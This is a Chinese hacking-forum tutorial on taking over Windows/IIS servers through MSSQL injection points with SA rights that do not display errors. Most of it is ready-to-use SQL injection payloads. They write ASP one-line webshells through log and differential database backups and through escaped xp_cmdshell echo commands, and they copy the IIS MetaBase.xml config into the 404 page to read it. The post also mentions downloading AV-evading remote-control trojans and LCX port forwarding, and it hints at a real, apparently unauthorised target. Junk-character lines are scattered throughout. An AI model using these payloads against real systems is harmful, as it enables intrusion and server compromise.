中国网络渗透测试联盟
标题:
sa权限的教程.
[打印本页]
作者:
admin
时间:
2012-9-15 14:30
标题:
sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security Team -- 打造90后网安精英团队 ———————————————————————————————
: e' H) x. a& u1 R& k" t
! N7 s, f2 Z# M, O& g n& j
- _& w s8 k0 s, l! z
欢迎高手访问指导,欢迎新手朋友交流学习。
# P( e/ ]5 y' `( U# V% w0 ^& G, R
, {" H8 @4 c* I, E b
! G+ `1 ^- G0 W) v
( E3 M* ^0 ^% f6 O2 o
论坛:
http://www.90team.net/
: u5 { f" b+ s; d/ c1 y- j; W
1 _8 e1 j" X1 j: [' K- M3 {9 o
+ j! U5 x& P( F$ j% k# y6 ^2 a
( v$ ^% \) J5 W" ]$ r! F2 @
友情检测国家人才网
5 j0 p) U4 T6 u* _7 x7 \0 W
% j3 x; p B; L3 h7 S: N8 [/ C
0 V* ^- A, _; D
内容:MSSQL注入SA权限不显错模式下的入侵
' @% e. s' u& r N- i% m7 a
" f1 }& \# X* W9 {) e. p
9 p/ M t( D. H" @, d
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
2 B% W7 c2 o* b; r( g
/ y" M ?( H- C" j/ N& D& Z1 t2 P/ a
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
: K/ _, k9 F8 @6 L3 N0 M
8 D- ?, c1 k9 Y$ _" j1 |: K- Y
2 V8 R) X0 K7 v7 g# E5 E
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
/ A1 {* g& X% R; S* n3 f
/ j$ J5 @! a, |) z" ]) n
思路:
$ i$ M* r$ S: ?4 E# V4 t# E- A
# O+ |+ s. b" ]7 n2 R& y0 `
首先:
: j' ]5 |% b, r
1 J$ b2 T' o) [( H% Z! }
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
! H" u; h7 m( F' u) o
+ L' L7 b7 c( K% W& o) M
1.日志备份获得Webshell
2 C8 Z$ h. ^( @
8 k$ i# g0 x) {' k
2.数据库差异备份获得Webshell
3 c7 G) l r- L7 T, k
% P$ U. z5 s2 X: ]; j
4.直接下载免杀远控木马。
1 k- D# h+ H) `6 K! m
, N3 T, M8 e8 ~3 q
5.直接下载LCX将服务器端口转发出来
6 _* G, H' }' P5 M" Y0 [# T
' f- M% O+ N" t% j: Z/ d/ O
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
7 z2 Q/ f( x# A& p$ @9 E
+ U4 z$ p9 I9 t8 H2 A4 c& ]
1 f# x: S( b& h( E+ m# @
# ~, }6 A/ r9 W/ E; Y. C
在这里我就不浪费大家时间了,我已经测试过 日志备份和 数据库差异备份 都没有成功 我就不演示了。 直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
$ X) a, p' d; f" U% K
* ~; s( ^: U A1 Z
我直接演示后面一个方法
( C1 g# K: s1 h w& c$ C: R, J
. J: z" ] x% D c8 d: L; C
- ~5 K0 k: D* N
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
8 K5 k2 C. \1 ]3 Q% D( B( y5 u$ V
8 ]' C) p* c& \9 W c U- q2 \. m
2 j$ c8 q" K# Y4 ?
3 e" ^# e, |+ f$ f8 ]3 ?
$ ]/ V: i% b! {0 i- ? m" U
◆日志备份:
, M/ b9 _7 f. m" d+ r. {" `& S( V/ A% d s
; B$ `9 i$ v, G6 B6 h! }% S
4 X0 B4 v, A( f" p
1. 进行初始备份
- M7 ^3 Z$ O, \7 F
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
9 A6 v4 L( r* I2 m9 O
* U3 Z. Z% ]( M1 Z: Z3 o
2. 插入数据
# g6 ^: T- i! F8 D R" E: u) _
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
5 w1 N7 V' S7 W
9 W, }. k8 I7 p8 L
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
* n6 \6 T. x2 v* C
. O7 t7 {$ E0 D: M
3. 备份并获得文件,删除临时表
3 Z+ c2 ~! E$ w4 e2 ]
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
: U5 V. |2 U/ K) G# @9 @
" ]$ B% k: W2 F% S: ?
; K+ |" a% ?" h4 \" i
- Y9 W& H2 S3 g! P. ~1 _6 p$ k
◆数据库差异备份
% W1 q# H$ Y# d, I
' b5 o$ O3 R a+ p" z0 Y# J8 S
(1. 进行差异备份准备工作
# a+ q* C3 K) T
5 g8 I" R" d/ D4 s0 j
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
, `. f' P* a4 c: R$ \4 n2 J
# j& n6 ]6 G! o$ v
上面的 0x633A5C746573742E617370 是 c:\test.asp 路径转换后的16进制编码
! u% `- S! L6 Q3 @3 A. L& Q
5 {3 z6 }/ g4 N# S* `
: I) s- ~! `( I0 z& R
(2. 将数据写入到数据库
4 H2 { h8 E' f" F- b9 F2 m/ u
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
* D; S# {. Z* C# o2 ?
, e% \2 `4 H# O% S# z! B
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
* Z) t: x3 Q* |" d& [9 x
3 C# `. T; V- ~( D
3. 备份数据库并清理临时文件
# V, v) @4 Q H5 n: {, u9 }8 ]
7 ], }7 {. v. e+ H
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
( N$ p) U+ ?: }
7 [+ F0 C! N. z' M9 }
0x633A5C746573742E617370 为 c:\test.asp 删除临时文件
3 n3 k5 j" u6 X: k: _* G
% @+ M- K. u/ V. J( j% T) n
, N3 a1 y; n- a% y# B( t
7 h! l& R- [6 ]) U" d' j3 X1 X
用^转义字符来写ASP(一句话木马)文件的方法:
2 ~- X9 ]& ^, i% ?/ U
/ E/ \1 s! x3 W4 T0 k2 v% b
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
! q' j% a0 p8 V! v7 p
! M- B8 ~; u, u8 p
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
1 r" g$ r9 t& m6 {3 e7 ^5 [, \
0 K) I# F9 ^- U
读取IIS配置信息获取web路径
* W$ B- D2 F$ o& A8 C/ n7 u2 |/ e, H
$ d7 D& H) R6 r
i# u6 z4 E2 B* A5 y4 [
注入点后面执行 ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
1 W4 s$ {! M4 N
0 J6 S* c: N! w' Y, J3 b
执行命令
9 W. Z- {& x6 R( z8 c
9 i& N" f3 I4 I9 O! o- h7 c
注入点后面执行 ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
! E$ p7 v6 q r: Z! `
\# N9 Q( V2 X, { `8 o* l
# X2 U# b) c; S2 n
8 E( t7 E6 {( t1 d8 L' T: n
9 |" F' d. \( |6 X' R6 P
- [8 v9 N& q) j# i7 F& a' B
5 Z) D3 {! G9 F
8 [6 L4 A1 \' ~# D" |
0 B w/ e4 H8 p; N+ V1 V D
/ V5 H; g1 u: \3 p0 c
6 A2 o0 C$ w0 ?" F2 h
- d z8 y0 z6 o
$ X! _. @+ T* ^' a, |5 V6 U
- z/ a% I R& U. Z
, j! W$ ^! o2 f0 ?3 H
/ S6 r8 V. C( b! B) V" u( h' `
/ q6 ]; g) c, F! l5 u4 U0 T, O+ f
0 U; p# a, \1 y6 |+ L: D
- G5 t% K& B. F- C
. J B" E0 Z" P# N% X
3 Q3 v! R& r. Y/ _ U
! v# V/ M% B; |; T2 P3 U# L
% X1 Q$ L6 o5 X5 s. ]) O9 h
2 ]$ P1 b- Q* O/ P" U, J+ b* V
5 h% I5 h! A4 R% v
, _ {9 S* O$ K4 B# t/ o2 J
9 Y8 r, r/ Z* X2 N8 A2 o1 J
* ?1 `9 k( k5 s# ^' c3 M9 O
$ ~8 v1 [, y* w* F6 l, m* G% U$ q
9 }+ ]4 J; X8 a# c( g* z
. V# `+ ~ M: r& L
: l& p# t' p8 b4 u
' G. P% z' @: r4 k% y% l! J
; }9 m/ S9 e: ^9 D& s* L" D
9 I7 J# r. A3 x& f6 Z. D: L
1 @( S$ B m, O: W+ G! J+ [* E1 ~
7 b: M0 d4 L' ~) P" \! t' o# ]7 y
3 E6 i1 l' q" n2 r6 p3 s
- Y7 ^/ w3 i% A+ r* [
5 c( ~: D0 t, d3 }. E$ p
. D# Z/ o( [4 C
7 u) ?. ^1 ]8 j t# J7 X. [
9 o7 Z1 {8 Q: j9 X f* A
. |# }' j6 q% G) k0 l1 N
% l, o! O, n$ x9 C1 e2 Y$ V l
% _% K8 b% ~0 A1 n( ]" [" r
' D* x0 T4 d2 M! q6 f& g
% T: e# U! ]$ w1 w
1 h: z8 U8 U& ?' T, M: w
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2